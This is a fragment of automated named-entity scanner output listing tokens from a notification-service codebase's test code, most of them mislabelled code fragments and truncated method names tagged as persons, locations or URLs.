'LETTER_TYPE'], ['PERSON', 'ReturnedLetter'], ['LOCATION', 'save_model_user(user'], ['PERSON', 'crown=True'], ['PERSON', 'crown=crown'], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['PERSON', 'sms_sender = ServiceSmsSender.query.filter_by(service_id='], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'to_field'], ['DATE_TIME', 'SMS_TYPE'], ['PERSON', 'billable_units=1'], ['PERSON', 'service_id'], ['PERSON', 'create_inbound_sms'], ['LOCATION', 'service.inbound_number'], ['LOCATION', 'service_inbound_api'], ['PERSON', 'save_service_callback_api(service_callback_api'], ['PERSON', "post_class='second"], ['PERSON', 'crown=crown'], ['LOCATION', 'create_api_key(service'], ['PERSON', "provider='mmg"], ['PERSON', 'organisation_id'], ['LOCATION', 'sorted_count=0'], ['LOCATION', 'messages_total=35'], ['LOCATION', 'EMAIL_TYPE'], ['DATE_TIME', "2018-06-05T14:00:15.952Z'"], ['DATE_TIME', "2018-06-05T14:00:15.952Z'"], ['DATE_TIME', "2018-06-05T14:00:15.952Z'"], ['DATE_TIME', '2016-03-14T12:35:26.665Z",\\n'], ['URL', 'dd426d95ee9390147a5624348ee.pe'], ['PERSON', 'invited_user = InvitedUser(**data'], ['DATE_TIME', 'year\n '], ['PERSON', 'org_1 = create_organisation'], ['LOCATION', 'billable_unit=3'], ['LOCATION', 'rate=.50'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'notifications_sent=7'], ['LOCATION', 'notifications_sent=8'], ['LOCATION', 'rate=.50'], ['DATE_TIME', 'year\n '], ['DATE_TIME', 'year\n '], ['PERSON', 'ReturnedLetter'], ['NRP', 'contact_list'], ['PERSON', 'message_type=message_type'], ['LOCATION', 'broadcast_message.areas'], ['URL', 'https://something.com'], ['URL', 'https://something.com'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.in'], ['URL', 'app.dao.jo'], ['URL', 'app.dao.no'], ['URL', 'app.dao.org'], ['URL', 'app.dao.pe'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.se'], ['URL', 'app.dao.us'], ['URL', 'app.mo'], ['URL', 'email.com'], ['URL', 'User.query.fi'], ['URL', 'service.id'], ['URL', 'user.id'], ['URL', 'dao.se'], ['URL', 'Service.query.fi'], ['URL', 'email.com'], ['URL', 'service.cr'], ['URL', 'service.ac'], ['URL', 'service.re'], ['URL', 'service.co'], ['URL', 'service.us'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'inbound.id'], ['URL', 'ServiceSmsSender.query.fi'], ['URL', 'service.id'], ['URL', 'service.id'], ['URL', 'sender.id'], ['URL', 'service.cr'], ['URL', 'template.ar'], ['URL', 'email.com'], ['URL', 'ApiKey.query.fi'], ['URL', 'ApiKey.se'], ['URL', 'template.se'], ['URL', 'ApiKey.ke'], ['URL', 'template.se'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'job.id'], ['URL', 'template.service.id'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'key.id'], ['URL', 'key.ke'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'template.cr'], ['URL', 'ServicePermission.query.al'], ['URL', 'service.in'], ['URL', 'service.id'], ['URL', 'service.ge'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'x2.pn'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'organisation.id'], ['URL', 'email.com'], ['URL', 'Notify-20180118123.rs'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'service.id'], ['URL', 'job.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'dao.in'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'ServiceGuestList.fr'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'notification.id'], ['URL', 'service.id'], ['URL', 'datetime.no'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'someservicenotifications.service.gov.uk'], ['URL', 'notifications.service.gov.uk'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'a6-238.smtp-out.eu-west-1.amazonses.com'], ['URL', 'service.id'], ['URL', 'email.com'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'date.st'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letter.id'], ['URL', 'letter.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '1.id'], ['URL', 'emails.na'], ['URL', '2.id'], ['URL', 'letters.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letters.id'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'org.id'], ['URL', 'allowance.id'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'service.id'], ['URL', 'by.id'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'message.se'], ['URL', 'message.ar'], ['URL', 'www.notifications.service.gov.uk'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com']] |